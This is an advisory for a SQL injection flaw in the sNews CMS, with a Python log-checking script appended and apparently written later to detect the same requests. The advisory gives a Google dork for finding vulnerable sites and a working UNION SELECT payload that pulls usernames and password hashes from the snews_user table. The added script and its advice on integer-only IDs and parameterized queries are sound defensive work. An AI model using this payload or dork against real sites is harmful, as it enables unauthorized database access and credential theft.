Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL PoC:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
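
For defenders, a log check for requests of this shape. This is an added example, not part of the original advisory or of sNews; the function names, the keyword list and the assumption that a legitimate id is a plain non-negative integer are illustrative.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request URIs (not real logs). The second is the example URL from
# the advisory; the others are made up for contrast.
SAMPLE_REQUESTS = [
    "/snews/snews.php?act=shownews&id=23",
    "/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,"
    "concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user"
    "/**/where/**/id%20like%201/*",
    "/snews/snews.php?act=shownews&id=7%27",
    "/snews/snews.php?act=showcat&id=4",
]

# Closed /*...*/ comments, or an unterminated /* running to end of string.
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
SQL_KEYWORDS = re.compile(r"\b(union|select|from|where|concat|like)\b", re.I)

def normalize(value):
    """Decode once more (double encoding) and turn SQL comments into spaces,
    so 'union/**/select' is matched as 'union select'."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", unquote(value))).strip()

def check_request(request_uri):
    """Classify one request URI as ignore / ok / suspicious / sqli."""
    parts = urlsplit(request_uri)
    params = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return "ignore", []
    ids = params.get("id", [])
    reasons = []
    if len(ids) != 1:
        reasons.append("id missing or repeated")
    for raw in ids:
        # Assumption: a legitimate article id is a plain non-negative integer.
        if not re.fullmatch(r"\d+", raw):
            reasons.append("id is not a plain integer")
        hits = sorted({m.lower() for m in SQL_KEYWORDS.findall(normalize(raw))})
        if hits:
            reasons.append("SQL keywords after comment stripping: " + ",".join(hits))
    if any(r.startswith("SQL keywords") for r in reasons):
        return "sqli", reasons
    return ("suspicious" if reasons else "ok"), reasons

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(check_request(uri)[0], uri[:60])
```

The same integer-only rule on id belongs in the application itself, together with a parameterized query; the log check only shows which requests would have violated it.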

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*